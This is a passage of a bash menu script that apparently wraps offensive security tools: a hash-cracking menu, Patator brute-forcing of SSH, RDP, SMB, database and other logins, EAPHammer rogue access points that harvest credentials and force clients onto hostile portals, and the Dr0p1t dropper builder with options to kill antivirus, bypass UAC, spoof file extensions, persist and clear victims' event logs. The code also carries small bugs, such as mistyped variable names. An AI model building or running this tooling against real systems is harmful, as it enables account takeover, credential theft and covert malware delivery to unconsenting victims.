  1751. read DICTSEL
  1752. clear
  1753. if [[ "$DICTSEL" = 1 ]]
  1754. then
  1755. echo -e "Type the path of the dictionary:"
  1756. read DICTPATH
  1757. if [[ ! -f "$DICTPATH" ]]
  1758. then
  1759. echo -e ""$RS"No such file"$CE""
  1760. sleep 2
  1761. continue
  1762. fi
  1763. DICTTYPE=1
  1764. elif [[ "$DICTSEL" = 2 ]]
  1765. then
  1766. echo -e "Type the path of the first dictionary:"
  1767. read DICTPATH
  1768. if [[ ! -f "$DICTPATH" ]]
  1769. then
  1770. echo -e ""$RS"No such file"$CE""
  1771. sleep 2
  1772. continue
  1773. fi
  1774. while true
  1775. do
  1776. clear
  1777. echo -e ""$RS"----------TO STOP, TYPE 0----------"
  1778. echo -e "Type the path of the next dictionary: "
  1779. read DICTNEXT
  1780. if [[ "$DICTNEXT" = "0" || "$DICTNEXT" = "o" || "$DICTNEXT" = "O" ]]
  1781. then
  1782. DICTTYPE=2
  1783. break
  1784. fi
  1785. if [[ ! -f "$DICTNEXT" ]]
  1786. then
  1787. echo -e ""$RS"No such file"$CE""
  1788. sleep 2
  1789. continue
  1790. fi
  1791. DICTPATH=""$DICTPATH","$DICTNEXT""
  1792. done
  1793. elif [[ "$DICTSEL" = 3 ]]
  1794. then
  1795. echo -e "Type the path of the folder:"
  1796. read DICTPATH
  1797. if [[ ! -d "$DICTPATH" ]]
  1798. then
  1799. echo -e ""$RS"No such folder"$CE""
  1800. sleep 2
  1801. continue
  1802. fi
  1803. DICTTYPE=3
  1804. elif [[ "$DICTSEL" = "back" || "$DICTSEL" = "b" ]]
  1805. then
  1806. continue
  1807. fi
  1808. elif [[ "$DAGON" = 3 ]]
  1809. then
  1810. if [[ ! -f /root/lscript/hashlog.txt ]]
  1811. then
  1812. echo -e ""$RS"No log found."$CE""
  1813. sleep 2
  1814. else
  1815. cat /root/lscript/hashlog.txt
  1816. echo -e "$PAKTGB"
  1817. $READAK
  1818. fi
  1819. elif [[ "$DAGON" = 1 ]]
  1820. then
  1821. clear
  1822. echo -e ""$YS" 1"$CE") Type a hash"
  1823. echo -e ""$YS" 2"$CE") Type multiple hashes"
  1824. echo -e ""$YS" 3"$CE") Select a file with hashes"
  1825. echo -e ""$YS" b"$CE") Go back"
  1826. echo -e "Choose: "
  1827. read HASHES
  1828. clear
  1829. if [[ "$HASHES" = "back" || "$HASHES" = "b" ]]
  1830. then
  1831. continue
  1832. elif [[ "$HASHES" = 1 ]]
  1833. then
  1834. echo -e "Type your hash: "
  1835. read HASH
  1836. HASHTYPE=1
  1837. elif [[ "$HASHES" = 2 ]]
  1838. then
  1839. echo -e "Type your first hash: "
  1840. read HASH
  1841. echo -e "$HASH" > $LPATH/hashes.txt
  1842. while true
  1843. do
  1844. clear
  1845. echo -e ""$RS"----------TO STOP, TYPE 0----------"
  1846. echo -e "Type your next hash: "
  1847. read HASH
  1848. if [[ "$HASH" = "0" || "$HASH" = "o" || "$HASH" = "O" ]]
  1849. then
  1850. HASH="multiple"
  1851. break
  1852. fi
  1853. echo -e "$HASH" >> $LPATH/hashes.txt
  1854. done
  1855. HASHTYPE=2
  1856. elif [[ "$HASHES" = 3 ]]
  1857. then
  1858. echo -e "Type the full path of the file: "
  1859. read HASHPATH
  1860. if [[ ! -f "$HASHPATH" ]]
  1861. then
  1862. echo -e ""$RS"There is not such file."$CE""
  1863. sleep 3
  1864. else
  1865. HASH="$HASHPATH"
  1866. fi
  1867. HASHTYPE=3
  1868. fi
  1869. elif [[ "$DAGON" = 00 ]]
  1870. then
  1871. exec bash $0
  1872. elif [[ "$DAGON" = 0 ]]
  1873. then
  1874. clear
  1875. exit
  1876. elif [[ "$DAGON" = 2 ]]
  1877. then
  1878. if [[ "$CORV" = "crack" ]]
  1879. then
  1880. CORV="verify"
  1881. else
  1882. CORV="crack"
  1883. fi
  1884. fi
  1885. done
  1886. }
  1887. function patator_automation
  1888. {
  1889. while true
  1890. do
  1891. clear
  1892. echo -e ""$BS"Modes"$CE":"
  1893. pttr=$(cat <<EOF
  1894. $YS 1$CE) ftp_login : Brute-force FTP
  1895. $YS 2$CE) ssh_login : Brute-force SSH
  1896. $YS 3$CE) telnet_login : Brute-force Telnet
  1897. $YS 4$CE) smtp_login : Brute-force SMTP
  1898. $YS 5$CE) smtp_vrfy : Enumerate valid users using the SMTP VRFY command
  1899. $YS 6$CE) smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
  1900. $YS 7$CE) finger_lookup : Enumerate valid users using Finger
  1901. $YS 8$CE) http_fuzz : Brute-force HTTP/HTTPS
  1902. $YS 9$CE) ajp_fuzz : Brute-force AJP
  1903. $YS 10$CE) pop_login : Brute-force POP
  1904. $YS 11$CE) pop_passd : Brute-force poppassd (not POP3)
  1905. $YS 12$CE) imap_login : Brute-force IMAP
  1906. $YS 13$CE) ldap_login : Brute-force LDAP
  1907. $YS 14$CE) smb_login : Brute-force SMB
  1908. $YS 15$CE) smb_lookupsid : Brute-force SMB SID-lookup
  1909. $YS 16$CE) rlogin_login : Brute-force rlogin
  1910. $YS 17$CE) vmauthd_login : Brute-force VMware Authentication Daemon
  1911. $YS 18$CE) mssql_login : Brute-force MSSQL
  1912. $YS 19$CE) oracle_login : Brute-force Oracle
  1913. $YS 20$CE) mysql_login : Brute-force MySQL
  1914. $YS 21$CE) mysql_query : Brute-force MySQL queries
  1915. $YS 22$CE) rdp_login : Brute-force RDP (NLA)
  1916. $YS 23$CE) pgsql_login : Brute-force PostgreSQL
  1917. $YS 24$CE) vnc_login : Brute-force VNC
  1918. $YS 25$CE) dns_forward : Brute-force DNS
  1919. $YS 26$CE) dns_reverse : Brute-force DNS (reverse lookup subnets)
  1920. $YS 27$CE) ike_enum : Enumerate IKE transforms
  1921. $YS 28$CE) snmp_login : Brute-force SNMPv1/2 and SNMPv3
  1922. $YS 29$CE) unzip_pass : Brute-force the password of encrypted ZIP files
  1923. $YS 30$CE) keystore_pass : Brute-force the password of Java keystore files
  1924. $YS 31$CE) sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  1925. $YS 32$CE) umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  1926. EOF
  1927. )
  1928. echo -e "$pttr"
  1929. echo -e "Choose: "
  1930. read PT
  1931. if [[ "$PT" = 1 ]]
  1932. then
  1933. XPT="ftp_login"
  1934. elif [[ "$PT" = 2 ]]
  1935. then
  1936. XPT="ssh_login"
  1937. elif [[ "$PT" = 3 ]]
  1938. then
  1939. XPT="telnet_login"
  1940. elif [[ "$PT" = 4 ]]
  1941. then
  1942. XPT="smtp_login"
  1943. elif [[ "$PT" = 5 ]]
  1944. then
  1945. XPT="smtp_vrfy"
  1946. elif [[ "$PT" = 6 ]]
  1947. then
  1948. XPT="smtp_rcpt"
  1949. elif [[ "$PT" = 7 ]]
  1950. then
  1951. XPT="finger_lookup"
  1952. elif [[ "$PT" = 8 ]]
  1953. then
  1954. XPT="http_fuzz"
  1955. elif [[ "$PT" = 9 ]]
  1956. then
  1957. XPT="ajp_fuzz"
  1958. elif [[ "$PT" = 10 ]]
  1959. then
  1960. XPT="pop_login"
  1961. elif [[ "$PT" = 11 ]]
  1962. then
  1963. XPT="pop_passd"
  1964. elif [[ "$PT" = 12 ]]
  1965. then
  1966. XPT="imap_login"
  1967. elif [[ "$PT" = 13 ]]
  1968. then
  1969. XPT="ldap_login"
  1970. elif [[ "$PT" = 14 ]]
  1971. then
  1972. XPT="smb_login"
  1973. elif [[ "$PT" = 15 ]]
  1974. then
  1975. XPT="smb_lookupsid"
  1976. elif [[ "$PT" = 16 ]]
  1977. then
  1978. XPT="rlogin_login"
  1979. elif [[ "$PT" = 17 ]]
  1980. then
  1981. XPT="vmauthd_login"
  1982. elif [[ "$PT" = 18 ]]
  1983. then
  1984. XPT="mssql_login"
  1985. elif [[ "$PT" = 19 ]]
  1986. then
  1987. XPT="oracle_login"
  1988. elif [[ "$PT" = 20 ]]
  1989. then
  1990. XPT="mysql_login"
  1991. elif [[ "$PT" = 21 ]]
  1992. then
  1993. XPT="mysql_query"
  1994. elif [[ "$PT" = 22 ]]
  1995. then
  1996. XPT="rdp_login"
  1997. elif [[ "$PT" = 23 ]]
  1998. then
  1999. XPT="pgsql_login"
  2000. elif [[ "$PT" = 24 ]]
  2001. then
  2002. XPT="vnc_login"
  2003. elif [[ "$PT" = 25 ]]
  2004. then
  2005. XPT="dns_forward"
  2006. elif [[ "$PT" = 26 ]]
  2007. then
  2008. XPT="dns_reverse"
  2009. elif [[ "$PT" = 27 ]]
  2010. then
  2011. XPT="ike_enum"
  2012. elif [[ "$PT" = 28 ]]
  2013. then
  2014. XPT="snmp_login"
  2015. elif [[ "$PT" = 29 ]]
  2016. then
  2017. XPT="unzip_pass"
  2018. elif [[ "$PT" = 30 ]]
  2019. then
  2020. XPT="keystore_pass"
  2021. elif [[ "$PT" = 31 ]]
  2022. then
  2023. XPT="sqlcipher_pass"
  2024. elif [[ "$PT" = 32 ]]
  2025. then
  2026. XPT="umbraco_crack"
  2027. fi
  2028. if [[ "$XPT" = "" ]]
  2029. then
  2030. echo -e ""$RS"Wrong choice"$CE""
  2031. sleep 3
  2032. continue
  2033. else
  2034. cd /root/patator
  2035. export XTP
  2036. xterm -T "INSTRUCTIONS" -hold -e "echo -e "---------------------------------------" && echo -e 'start with: python patator.py $XPT' && echo -e "---------------------------------------" && python patator.py $XPT" & disown
  2037. xterm -T "PATATOR" -hold & disown
  2038. fi
  2039. done
  2040. }
  2041. function eaphammer_automation
  2042. {
  2043. while true
  2044. do
  2045. clear
  2046. TERMINALTITLE="EAPHAMMER"
  2047. dash_calc
  2048. printf '\033]2;EAPHAMMER\a'
  2049. if [[ "$EAPHIFACE" = "" ]]
  2050. then
  2051. EAPHIFACE="$WLANN"
  2052. fi
  2053. if [[ "$EAPHESSID" = "" ]]
  2054. then
  2055. EAPHESSID=""$RS"NONE"$CE""
  2056. OK1=0
  2057. elif [[ "$EAPHESSID" != "\e[1;31mNONE\e[0m" ]]
  2058. then
  2059. OK1=1
  2060. fi
  2061. if [[ "$EAPHBSSID" = "" ]]
  2062. then
  2063. EAPHBSSID=""$RS"NONE"$CE""
  2064. OK1=0
  2065. fi
  2066. if [[ "$EAPHCHANNEL" = "" ]]
  2067. then
  2068. EAPHCHANNEL=""$RS"NONE"$CE""
  2069. OK1=0
  2070. fi
  2071. if [[ "$EAPHWPA" = "" ]]
  2072. then
  2073. EAPHWPA="2"
  2074. fi
  2075. if [[ "$EAPHAUTH" = "" ]]
  2076. then
  2077. EAPHAUTH=""$RS"NONE"$CE""
  2078. OK1=0
  2079. fi
  2080. if [[ "$EAPHCREDS" = "" ]]
  2081. then
  2082. EAPHCREDS="OFF"
  2083. fi
  2084. if [[ "$EAPHHOSTILE" = "" ]]
  2085. then
  2086. EAPHHOSTILE="OFF"
  2087. fi
  2088. if [[ "$EAPHCAPTIVE" = "" ]]
  2089. then
  2090. EAPHCAPTIVE="OFF"
  2091. fi
  2092. if [[ "$EAPHPIVOT" = "" ]]
  2093. then
  2094. EAPHPIVOT="OFF"
  2095. fi
  2096. if [[ "$EAPHKARMA" = "" ]]
  2097. then
  2098. EAPHKARMA="OFF"
  2099. fi
  2100. if [[ "$EAPHAIRCRACK" = "" ]]
  2101. then
  2102. EAPHAIRCRACK="OFF"
  2103. fi
  2104. if [[ "$EAPHINTAUTO" = "" ]]
  2105. then
  2106. EAPHINTAUTO="OFF"
  2107. fi
  2108. if [[ "$EAPHAIRCRACK" = "OFF" && "$EAPHINTAUTO" = "OFF" && "$EAPHWORD" = "" ]]
  2109. then
  2110. EAPHWORD="OFF"
  2111. fi
  2112. if [[ "$EAPHAIRCRACK" = "OFF" && "$EAPHINTAUTO" = "OFF" && "$EAPHWORD" = "OFF" ]]
  2113. then
  2114. EAPHWORD="OFF"
  2115. fi
  2116. OK2=1
  2117. if [[ "$EAPHAIRCRACK" != "OFF" ]]
  2118. then
  2119. if [[ "$EAPHWORD" = "OFF" || "$EAPHWORD" = "\e[1;31mNONE\e[0m" ]]
  2120. then
  2121. EAPHWORD="\e[1;31mNONE\e[0m"
  2122. OK2=0
  2123. fi
  2124. fi
  2125. if [[ "$EAPHINTAUTO" = "ON" || "$EAPHWORD" = "\e[1;31mNONE\e[0m" ]]
  2126. then
  2127. if [[ "$EAPHWORD" = "OFF" ]]
  2128. then
  2129. EAPHWORD="\e[1;31mNONE\e[0m"
  2130. OK2=0
  2131. fi
  2132. fi
  2133. if [[ "$EAPHINTAUTO" = "OFF" && "$EAPHAIRCRACK" = "OFF" ]]
  2134. then
  2135. if [[ "$EAPHWORD" = "\e[1;31mNONE\e[0m" ]]
  2136. then
  2137. EAPHWORD="OFF"
  2138. fi
  2139. fi
  2140. echo -e ""$YS" 1"$CE") Create a new RADIUS cert for your AP"
  2141. echo -e ""$YS" 2"$CE") Set your interface for the AP CURRENT: $EAPHIFACE"
  2142. echo -e ""$YS" 3"$CE") Specify access point ESSID CURRENT: $EAPHESSID"
  2143. echo -e ""$YS" 4"$CE") Specify access point BSSID CURRENT: $EAPHBSSID"
  2144. echo -e ""$YS" 5"$CE") Specify access point channel CURRENT: $EAPHCHANNEL"
  2145. echo -e ""$YS" 6"$CE") Specify WPA type CURRENT: $EAPHWPA"
  2146. echo -e ""$YS" 7"$CE") Specify auth type CURRENT: $EAPHAUTH"
  2147. echo -e ""$YS" 8"$CE") Harvest EAP creds CURRENT: $EAPHCREDS"
  2148. echo -e ""$YS" 9"$CE") Force clients to connect to hostile portal CURRENT: $EAPHHOSTILE"
  2149. echo -e ""$YS"10"$CE") Force clients to connect to captive portal CURRENT: $EAPHCAPTIVE"
  2150. echo -e ""$YS"11"$CE") Perform an indirect wireless pivot CURRENT: $EAPHPIVOT"
  2151. echo -e ""$YS"12"$CE") Enable karma CURRENT: $EAPHKARMA"
  2152. echo -e ""$YS"13"$CE") Use autocrack/add with remote cracking rig CURRENT: $EAPHAIRCRACK"
  2153. echo -e ""$YS"14"$CE") Use internal autocrack CURRENT: $EAPHINTAUTO"
  2154. echo -e ""$YS"15"$CE") Specify wordlist for autocrack CURRENT: $EAPHWORD"
  2155. echo -e ""$YS"start"$CE") Start "
  2156. echo -e ""$YS"00"$CE") Main menu"
  2157. echo -e ""$YS" back"$CE") Go back"
  2158. echo -e "Choose: "
  2159. read EAPH
  2160. clear
  2161. if [[ "$EAPH" = 1 ]]
  2162. then
  2163. cd /root/eaphammer
  2164. ./eaphammer --cert-wizard
  2165. elif [[ "$EAPH" = 2 ]]
  2166. then
  2167. echo -e "Type the interface you want to use: "
  2168. read EAPHIFACE
  2169. elif [[ "$EAPH" = 3 ]]
  2170. then
  2171. echo -e "Type the ESSID: "
  2172. read EAPHESSID
  2173. elif [[ "$EAPH" = 4 ]]
  2174. then
  2175. echo -e "Type the BSSID: "
  2176. read EAPHBSSID
  2177. elif [[ "$EAPH" = 5 ]]
  2178. then
  2179. echo -e "Type the channel: "
  2180. read EAPHCHANNEL
  2181. elif [[ "$EAPH" = 6 ]]
  2182. then
  2183. if [[ "$EAPHWPA" = 1 ]]
  2184. then
  2185. EAPHWPA=2
  2186. else
  2187. EAPHWPA=1
  2188. fi
  2189. elif [[ "$EAPH" = 7 ]]
  2190. then
  2191. echo -e ""$YS" 1"$CE") Open"
  2192. echo -e ""$YS" 2"$CE") ttls"
  2193. echo -e ""$YS" 3"$CE") peap"
  2194. echo -e "Choose: "
  2195. read PAUTH
  2196. if [[ "$PAUTH" = 1 ]]
  2197. then
  2198. EAPHAUTH="open"
  2199. elif [[ "$PAUTH" = 2 ]]
  2200. then
  2201. EAPHAUTH="ttls"
  2202. elif [[ "$PAUTH" = 3 ]]
  2203. then
  2204. EAPHAUTH="peap"
  2205. fi
  2206. elif [[ "$EAPH" = 8 ]]
  2207. then
  2208. if [[ "$EAPHCREDS" = "OFF" ]]
  2209. then
  2210. EAPHCREDS="ON"
  2211. else
  2212. EAPHCREDS="OFF"
  2213. fi
  2214. elif [[ "$EAPH" = 9 ]]
  2215. then
  2216. if [[ "$EAPHHOSTILE" = "OFF" ]]
  2217. then
  2218. EAPHHOSTILE="ON"
  2219. else
  2220. EAPHHOSTILE="OFF"
  2221. fi
  2222. elif [[ "$EAPH" = 10 ]]
  2223. then
  2224. if [[ "$EAPHCAPTIVE" = "OFF" ]]
  2225. then
  2226. EAPHCAPTIVE="ON"
  2227. else
  2228. EAPHCAPTIVE="OFF"
  2229. fi
  2230. elif [[ "$EAPH" = 11 ]]
  2231. then
  2232. if [[ "$EAPHPIVOT" = "OFF" ]]
  2233. then
  2234. EAPHPIVOT="ON"
  2235. else
  2236. EAPHPIVOT="OFF"
  2237. fi
  2238. elif [[ "$EAPH" = 12 ]]
  2239. then
  2240. if [[ "$EAPHKARMA" = "OFF" ]]
  2241. then
  2242. EAPHKARMA="ON"
  2243. else
  2244. EAPHKARMA="OFF"
  2245. fi
  2246. elif [[ "$EAPH" = 13 ]]
  2247. then
  2248. if [[ "$EAPHAIRCRACK" = "OFF" ]]
  2249. then
  2250. clear
  2251. echo -e "Hostname: "
  2252. read HOSTN
  2253. echo -e "Port: "
  2254. read PORT
  2255. clear
  2256. EAPHAIRCRACK=""$HOSTN":"$PORT""
  2257. else
  2258. EAPHAIRCRACK="OFF"
  2259. fi
  2260. elif [[ "$EAPH" = 14 ]]
  2261. then
  2262. if [[ "$EAPHINTAUTO" = "OFF" ]]
  2263. then
  2264. EAPHINTAUTO="ON"
  2265. else
  2266. EAPHINTAUTO="OFF"
  2267. fi
  2268. elif [[ "$EAPH" = 15 ]]
  2269. then
  2270. if [[ "$EAPHWORD" != "OFF" && "$EAPHWORD" != "\e[1;31mNONE\e[0m" ]]
  2271. then
  2272. EAPHWORD="OFF"
  2273. else
  2274. clear
  2275. echo -e "Type the full wordlist path: "
  2276. read EAPHWORD
  2277. fi
  2278. elif [[ "$EAPH" = "back" || "$EAPH" = "b" ]]
  2279. then
  2280. clear
  2281. break
  2282. elif [[ "$EAPH" = "00" ]]
  2283. then
  2284. clear
  2285. exec bash $0
  2286. elif [[ "$EAPH" = "0" ]]
  2287. then
  2288. clear
  2289. exit
  2290. elif [[ "$EAPH" = "start" ]]
  2291. then
  2292. clear
  2293. if [[ "$OK1" != 1 ]]
  2294. then
  2295. echo -e "You haven't specified the important requirements"
  2296. sleep 4
  2297. continue
  2298. fi
  2299. if [[ "$OK2" != 1 ]]
  2300. then
  2301. echo -e "You haven't specified a wordlist for the autocrack"
  2302. sleep 4
  2303. continue
  2304. fi
  2305. if [[ "$EAPHCREDS" = "ON" ]]
  2306. then
  2307. CREDS="--creds"
  2308. else
  2309. CREDS=""
  2310. fi
  2311. if [[ "$EAPHHOSTILE" = "ON" ]]
  2312. then
  2313. HOSTILE="--hostile-portal"
  2314. else
  2315. HOSTILE=""
  2316. fi
  2317. if [[ "$EAPHCAPTIVE" = "ON" ]]
  2318. then
  2319. CAPTIVE="--captive-portal"
  2320. else
  2321. CAPTIVE=""
  2322. fi
  2323. if [[ "$EAPHPIVOT" = "ON" ]]
  2324. then
  2325. PIVOT="--pivot"
  2326. else
  2327. PIVOT=""
  2328. fi
  2329. if [[ "$EAPHKARMA" = "ON" ]]
  2330. then
  2331. KARMA="--karma"
  2332. else
  2333. KARMA=""
  2334. fi
  2335. if [[ "$EAPHINTAUTO" = "ON" ]]
  2336. then
  2337. INTAUTO="--local-autocrack"
  2338. else
  2339. INTAUTO=""
  2340. fi
  2341. if [[ "$EAPHAIRCRACK" != "OFF" ]]
  2342. then
  2343. AIRCRACK="--remote-autocrack $EAPHAIRCRACK"
  2344. else
  2345. AIRCRACK=""
  2346. fi
  2347. if [[ "$EAPHAIRCRACK" != "OFF" || "$EAPHINTAUTO" != "OFF" ]]
  2348. then
  2349. WORD="--wordlist $EAPHWORD"
  2350. else
  2351. WORD=""
  2352. fi
  2353. IFACE="-i $EAPHIFACE"
  2354. CHANNEL="-c $EAPHCHANNEL"
  2355. ESSID="-e $EAPHESSID"
  2356. BSSID="-b $EAPHBSSID"
  2357. WPA="--wpa $EAPHWPA"
  2358. AUTH="--auth $EAPHAUTH"
  2359. cd /root/eaphammer
  2360. ./eaphammer $IFACE $CHANNEL $BSSID $ESSID $WPA $AUTH $PIVOT $KARMA $INTAUTO $CAPTIVE $HOSTILE $CREDS $AIRCRACK $WORD
  2361.  
  2362. fi
  2363. done
  2364. }
  2365. function dropit_automation
  2366. {
  2367. clear
  2368. while true
  2369. do
  2370. clear
  2371. TERMINALTITLE="Dr0p1t-Framework"
  2372. dash_calc
  2373. printf '\033]2;Dr0p1t-Framework\a'
  2374. if [[ "$MALURL" = "" ]]
  2375. then
  2376. MALURL="\e[1;31mNONE\e[0m"
  2377. fi
  2378. if [[ "$STARTUP" = "" ]]
  2379. then
  2380. STARTUP="OFF"
  2381. fi
  2382. if [[ "$TASK" = "" ]]
  2383. then
  2384. TASK="OFF"
  2385. fi
  2386. if [[ "$LTPUP" = "" ]]
  2387. then
  2388. LTPUP="OFF"
  2389. fi
  2390. if [[ "$KILLANT" = "" ]]
  2391. then
  2392. KILLANT="OFF"
  2393. fi
  2394. if [[ "$RUNBAT" = "" ]]
  2395. then
  2396. RUNBAT="OFF"
  2397. fi
  2398. if [[ "$RUNPOW" = "" ]]
  2399. then
  2400. RUNPOW="OFF"
  2401. fi
  2402. if [[ "$RUNVBS" = "" ]]
  2403. then
  2404. RUNVBS="OFF"
  2405. fi
  2406. if [[ "$UACASADMIN" = "" ]]
  2407. then
  2408. UACASADMIN="OFF"
  2409. fi
  2410. if [[ "$SPOOFEXT" = "" ]]
  2411. then
  2412. SPOOFEXT="OFF"
  2413. fi
  2414. if [[ "$ISZIP" = "" ]]
  2415. then
  2416. ISZIP="OFF"
  2417. fi
  2418. if [[ "$COMPRESS" = "" ]]
  2419. then
  2420. COMPRESS="OFF"
  2421. fi
  2422. if [[ "$DISUAC" = "" ]]
  2423. then
  2424. DISUAC="OFF"
  2425. fi
  2426. if [[ "$ICON" = "" ]]
  2427. then
  2428. ICON="OFF"
  2429. fi
  2430. if [[ "$EVENT" = "" ]]
  2431. then
  2432. EVENT="OFF"
  2433. fi
  2434. if [[ "$COMPILE" = "" ]]
  2435. then
  2436. COMPILE="OFF"
  2437. fi
  2438. if [[ "$D32" = "" ]]
  2439. then
  2440. D32="OFF"
  2441. fi
  2442. if [[ "$D64" = "" ]]
  2443. then
  2444. D64="OFF"
  2445. fi
  2446. if [[ "$BANN" = "" ]]
  2447. then
  2448. BANN="OFF"
  2449. fi
  2450. echo -e ""$YS" 1"$CE") Malware URL CURRENT:$MALURL"
  2451. echo -e ""$YS" 2"$CE") Malware to startup CURRENT:$STARTUP"
  2452. echo -e ""$YS" 3"$CE") Malware to task scheduler CURRENT:$TASK"
  2453. echo -e ""$YS" 4"$CE") Add link to powershell user profile CURRENT:$LTPUP"
  2454. echo -e ""$YS" 5"$CE") Kill antivirus before malware CURRENT:$KILLANT"
  2455. echo -e ""$YS" 6"$CE") Run batch script before malware CURRENT:$RUNBAT"
  2456. echo -e ""$YS" 7"$CE") Run powershell script before malware CURRENT:$RUNPOW"
  2457. echo -e ""$YS" 8"$CE") Run vbs script before malware CURRENT:$RUNVBS"
  2458. echo -e ""$YS" 9"$CE") Bypass UAC and run malware as admin CURRENT:$UACASADMIN"
  2459. echo -e ""$YS"10"$CE") Spoof final file to an extension CURRENT:$SPOOFEXT"
  2460. echo -e ""$YS"11"$CE") Malware is zip compressed CURRENT:$ISZIP"
  2461. echo -e ""$YS"12"$CE") Compress the final file with UPX CURRENT:$COMPRESS"
  2462. echo -e ""$YS"13"$CE") Try to disable UAC on victim device CURRENT:$DISUAC"
  2463. echo -e ""$YS"14"$CE") Use icon to the final file CURRENT:$ICON"
  2464. echo -e ""$YS"15"$CE") Don't clean target's event log CURRENT:$EVENT"
  2465. echo -e ""$YS"16"$CE") Don't compile the final file CURRENT:$COMPILE"
  2466. echo -e ""$YS"17"$CE") Download malware for 32 bit only CURRENT:$D32"
  2467. echo -e ""$YS"18"$CE") Download malware for 64 bit only CURRENT:$D64"
  2468. echo -e ""$YS"19"$CE") Stay quite(no banner) CURRENT:$BANN"
  2469. echo -e ""$YS" o"$CE") Open output folder"
  2470. echo -e ""$YS" u"$CE") Check for updates"
  2471. echo -e ""$YS" b"$CE") Go back"
  2472. echo -e ""$YS"start"$CE") Generate"
  2473. echo -e "Choose: "
  2474. read DR
  2475. clear
  2476. if [[ "$DR" = "o" ]]
  2477. then
  2478. gio open /root/Dr0p1t-Framework/output
  2479. continue
  2480. fi
  2481. if [[ "$DR" = "u" ]]
  2482. then
  2483. cd /root/Dr0p1t-Framework
  2484. python Dr0p1t.py -u
  2485. cd
  2486. continue
  2487. fi
  2488. if [[ "$DR" = "start" ]]
  2489. then
  2490. if [[ "$MALURL" = "\e[1;31mNONE\e[0m" ]]
  2491. then
  2492. echo -e ""$RS"No URL specified."$CE""
  2493. sleep 2
  2494. continue
  2495. fi
  2496. if [[ "$STARTUP" = "OFF" ]]
  2497. then
  2498. DSTARTUP=""
  2499. else
  2500. DSTARTUP="-s"
  2501. fi
  2502. if [[ "$TASK" = "OFF" ]]
  2503. then
  2504. DTASK=""
  2505. else
  2506. DTASK="-t"
  2507. fi
  2508. if [[ "$LTPUP" = "OFF" ]]
  2509. then
  2510. DLTPUP=""
  2511. else
  2512. DLTPUP="-a"
  2513. fi
  2514. if [[ "$KILLANT" = "OFF" ]]
  2515. then
  2516. DKILLANT=""
  2517. else
  2518. DKILLANT="-k"
  2519. fi
  2520. if [[ "$RUNBAT" = "OFF" ]]
  2521. then
  2522. DRUNBAT=""
  2523. else
  2524. DRUNBAT="-b $RUNBAT"
  2525. fi
  2526. if [[ "$RUNPOW" = "OFF" ]]
  2527. then
  2528. DRUNPOW=""
  2529. else
  2530. DRUNPOW="-p $RUNPOW"
  2531. fi
  2532. if [[ "$RUNVBS" = "OFF" ]]
  2533. then
  2534. DRUNVBS=""
  2535. else
  2536. DRUNVBS="-v $RUNVBS"
  2537. fi
  2538. if [[ "$UACASADMIN" = "OFF" ]]
  2539. then
  2540. DUACASADMIN=""
  2541. else
  2542. DUACASADMIN="--runas"
  2543. fi
  2544. if [[ "$SPOOFEXT" = "OFF" ]]
  2545. then
  2546. DSPOOFEXT=""
  2547. else
  2548. DSPOOFEXT="--spoof $SPOOFEXT"
  2549. fi
  2550. if [[ "$ISZIP" = "OFF" ]]
  2551. then
  2552. DISZIP=""
  2553. else
  2554. DISZIP="--zip"
  2555. fi
  2556. if [[ "$COMPRESS" = "OFF" ]]
  2557. then
  2558. DCOMPRESS=""
  2559. else
  2560. DCOMPRESS="--upx"
  2561. fi
  2562. if [[ "$DISUAC" = "OFF" ]]
  2563. then
  2564. DDISUAC=""
  2565. else
  2566. DDISIAC="--nouac"
  2567. fi
  2568. if [[ "$ICON" = "OFF" ]]
  2569. then
  2570. DICON=""
  2571. else
  2572. DICON="-i $ICON"
  2573. fi
  2574. if [[ "$EVENT" = "OFF" ]]
  2575. then
  2576. DEVENT=""
  2577. else
  2578. DEVENT="--noclearevent"
  2579. fi
  2580. if [[ "$COMPILE" = "OFF" ]]
  2581. then
  2582. DCOMPILE=""
  2583. else
  2584. DCOMPILE="--nocompile"
  2585. fi
  2586. if [[ "$D32" = "OFF" ]]
  2587. then
  2588. DD32=""
  2589. else
  2590. DD32="--only32"
  2591. fi
  2592. if [[ "$D64" = "OFF" ]]
  2593. then
  2594. DD64=""
  2595. else
  2596. DD64="--only64"
  2597. fi
  2598. if [[ "$BANN" = "OFF" ]]
  2599. then
  2600. DBANN=""
  2601. else
  2602. DBANN="-q"
  2603. fi
  2604. cd /root/Dr0p1t-Framework
  2605. python Dr0p1t.py $MALURL $DSTARTUP $DTASK $DLTPUP $DKILLANT $DRUNBAT $DRUNPOW $DRUNVBS $DUACASADMIN $DSPOOFEXT $DISZIP $DCOMPRESS $DDISUAC $DICON $DEVENT $DCOMPILE $DD32 $DD64 $DBANN
  2606. echo -e "$PAKTGB"
  2607. $READAK
  2608. cd
  2609. elif [[ "$DR" = 1 ]]
  2610. then
  2611. echo -e "Malware URL: "
  2612. read MALURL
  2613. elif [[ "$DR" = 14 ]]
  2614. then
  2615. if [[ "$ICON" = "OFF" ]]
  2616. then
  2617. while true
  2618. do
  2619. echo -e ""$RS"Icon must be on /root/Dr0p1t-Framework/icons folder."$CE""
  2620. echo -e ""
  2621. ls -1 /root/Dr0p1t-Framework/icons/
  2622. echo -e ""
  2623. echo -e ""$YS"cp"$CE") Copy my icon to that folder"
  2624. echo -e ""$YS" b"$CE") Go back"
  2625. echo -e "Enter the name of your icon: "
  2626. read ICON
  2627. if [[ "$ICON" = "b" ]]
  2628. then
  2629. ICON="OFF"
  2630. break
  2631. elif [[ "$ICON" = "m" ]]
  2632. then
  2633. clear
  2634. echo -e "Your file path: "
  2635. read FP
  2636. if [[ ! -f "$FP" ]]
  2637. then
  2638. echo -e ""$RS"File does not exist."$CE""
  2639. sleep 2
  2640. else
  2641. cp "$FP" /root/Dr0p1t-Framework/icons/
  2642. fi
  2643. elif [[ ! -f /root/Dr0p1t-Framework/icons/"$ICON" ]]
  2644. then
  2645. if [[ ! -f /root/Dr0p1t-Framework/icons/"$ICON".ico ]]
  2646. then
  2647. echo -e ""$RS"File not found."$CE""
  2648. sleep 2
  2649. else
  2650. ICON=""$ICON".ico"
  2651. break
  2652. fi
  2653. else
  2654. break
  2655. fi
  2656. done
  2657. else
  2658. ICON="OFF"
  2659. fi
  2660. elif [[ "$DR" = 8 ]]
  2661. then
  2662. if [[ "$RUNVBS" = "OFF" ]]
  2663. then
  2664. while true
  2665. do
